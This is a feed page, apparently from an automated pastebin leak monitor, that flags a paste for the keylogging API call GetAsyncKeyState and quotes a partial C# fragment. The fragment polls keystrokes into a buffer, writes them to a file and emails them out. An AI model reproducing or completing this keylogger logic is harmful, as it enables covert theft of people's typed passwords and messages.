Quantcast
Channel: pastebin.com – LeakedIn
Viewing all articles
Browse latest Browse all 2834

Potential leak of data: Windows GetAsyncKeyState API Call

$
0
0
Detected 4 occurrence(s) of ‘GetAsyncKeyState\(‘: buffer; if (text.Length > 0) { WriteTotxt(text); text = replaceChars(text); Email.Send(text); text = ""; } } bool shiftDown = GetAsyncKeyState(Keys.Shift) == -32767; foreach (...) { if (GetAsyncKeyState(i) == -32767) { var key = i.ToString(); buffer += shiftDown ? i : i.ToLower(); } } Source: http://pastebin.com/raw.php?i=5RkzZfyx

Viewing all articles
Browse latest Browse all 2834

Trending Articles